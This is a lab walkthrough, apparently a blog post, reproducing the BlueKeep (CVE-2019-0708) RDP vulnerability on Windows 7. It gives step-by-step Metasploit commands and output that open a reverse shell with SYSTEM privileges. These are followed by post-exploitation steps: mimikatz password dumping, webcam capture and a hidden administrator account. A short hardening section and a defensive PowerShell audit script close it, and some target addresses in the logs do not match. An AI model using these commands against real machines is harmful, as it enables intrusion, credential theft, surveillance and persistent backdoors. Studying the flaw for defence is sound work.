Vulnerability reproduction: "CVE_2019_0708 BlueKeep"

Updated: 2021-12-09

Environment

Tip: Windows 7 Ultimate SP1 x64 as the target, MSF (Metasploit Framework) as the attack box.

Enable Remote Desktop on the target.

Turn off the firewall on the target.

Exploitation

Early blue screen

This is the early exploit PoC:

```shell
git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
pip3 install impacket
python3 crashpoc.py 192.168.173.136 32   # python3 crashpoc.py <ip address> <system type>
```

Note: the PoC above knocks Win7 over even without the firewall being turned off!

Getting a shell

Download the attack scripts:

```shell
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
```

Import the attack scripts into the framework:

```shell
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
```

Vulnerability detection:

```text
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.173.136
set threads 5
run
[*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389 - The target is vulnerable.
[*] 192.168.173.136:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Exploitation:

```text
reload_all                  # load the attack scripts
search cve-2019-0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.173.130
set rport 3389
set target 3                # we are running the target in VMware, so target 3 can be used
exploit
[*] Started reverse TCP handler on 192.168.173.1:4444
[*] 192.168.173.136:3389 - Detected RDP on 192.168.173.136:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389 - The target is vulnerable.
[*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.173.136:3389 - Surfing channels ...
[*] 192.168.173.136:3389 - Lobbing eggs ...
[*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800
session 1
session 1
'session' 不是内部或外部命令，也不是可运行的程序或批处理文件。

C:\Windows\system32>whoami
whoami
nt authority\system
```

A shell was obtained, running with System privileges. The first exploit attempt blue-screened Win7; the shell came back normally on the next attempt.

Meaning of the target values (in module order):

- automatic, decided from the fingerprint
- physical machine
- VirtualBox VM
- VMware VM

Privilege escalation and post-exploitation:

```text
meterpreter > getuid          # get the uid
meterpreter > screenshot      # take a screenshot
meterpreter > webcam_snap     # take a webcam snapshot
meterpreter > load mimikatz   # get system passwords
meterpreter > wdigest         # get system passwords
rdesktop 192.168.173.138      # log in to the remote desktop
net user root$ root /add
net localgroup administrators root$ /add
```

The lab machine here is Win7. Windows Server 2008 needs a registry change first, otherwise it blue-screens: set the following value to 0.

```text
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp]
fDisableCam = 0
```

Hardening

Affected versions:

- Windows Server 2008 (R2)
- Windows 7 SP1
- Windows Server 2003
- Windows XP

Temporary hardening: block the remote port 3389.

Hot patch: see the Qi An Xin (奇安信) CVE-2019-0708 hot patch tool manual.

Original article by 小嵘源码; if you republish it, please credit the source: https://www.lcpttec.com/bluekeep/
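As an added example for the hardening section (not part of the original post), the script below checks a Windows host for the two things the scanner reported about the lab target, an affected release and RDP reachable without NLA, and can apply the temporary fix the post recommends (block TCP/3389) together with NLA enforcement. The function names are my own; it assumes an elevated PowerShell prompt on the host being checked and does not check whether the security update itself is installed.

```powershell
# Added example, not from the original post. Audits the local host for an
# affected Windows release plus RDP without NLA (what the scanner flagged), and
# optionally applies the hardening section's port block. Run elevated.

$RdpTcpKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
$TsKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Get-BlueKeepExposure {
    # Get-WmiObject, not Get-CimInstance: the latter is absent from the PowerShell 2.0 on Win7.
    $os = Get-WmiObject Win32_OperatingSystem
    # Kernel versions of the releases the post lists as affected:
    # 5.1 = XP, 5.2 = Server 2003, 6.0 = Server 2008, 6.1 = Win7 SP1 / Server 2008 R2.
    $affected   = @('5.1', '5.2', '6.0', '6.1')
    $majorMinor = ($os.Version -split '\.')[0..1] -join '.'

    $deny = (Get-ItemProperty -Path $TsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    $nla  = (Get-ItemProperty -Path $RdpTcpKey -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication

    $isAffected  = $affected -contains $majorMinor
    $rdpEnabled  = ($deny -eq 0)    # 0 = Remote Desktop connections allowed
    $nlaRequired = ($nla -eq 1)     # 1 = "Requires NLA: Yes" in the scanner's wording

    # Exposed means the pre-patch conditions hold; patch status is not checked here.
    New-Object PSObject -Property @{
        Host            = $env:COMPUTERNAME
        OsVersion       = $os.Version
        AffectedRelease = $isAffected
        RdpEnabled      = $rdpEnabled
        NlaRequired     = $nlaRequired
        Exposed         = ($isAffected -and $rdpEnabled -and -not $nlaRequired)
    }
}

function Invoke-BlueKeepMitigation {
    param([switch]$BlockPort)
    # Require Network Level Authentication before any RDP session channel is set
    # up; SecurityLayer 2 (TLS) is what the Remote Desktop dialog sets alongside it.
    Set-ItemProperty -Path $RdpTcpKey -Name UserAuthentication -Value 1 -Type DWord
    Set-ItemProperty -Path $RdpTcpKey -Name SecurityLayer     -Value 2 -Type DWord
    if ($BlockPort) {
        # The post's temporary hardening: refuse inbound TCP/3389 at the host firewall.
        # netsh is used because New-NetFirewallRule does not exist on Windows 7.
        netsh advfirewall firewall add rule name="Block RDP (CVE-2019-0708)" dir=in action=block protocol=TCP localport=3389 | Out-Null
    }
}

Get-BlueKeepExposure | Format-List Host, OsVersion, AffectedRelease, RdpEnabled, NlaRequired, Exposed
```

Run `Invoke-BlueKeepMitigation -BlockPort` only on hosts where Remote Desktop is not needed; on the others, enforcing NLA is the change that removes the unauthenticated path the scanner reported.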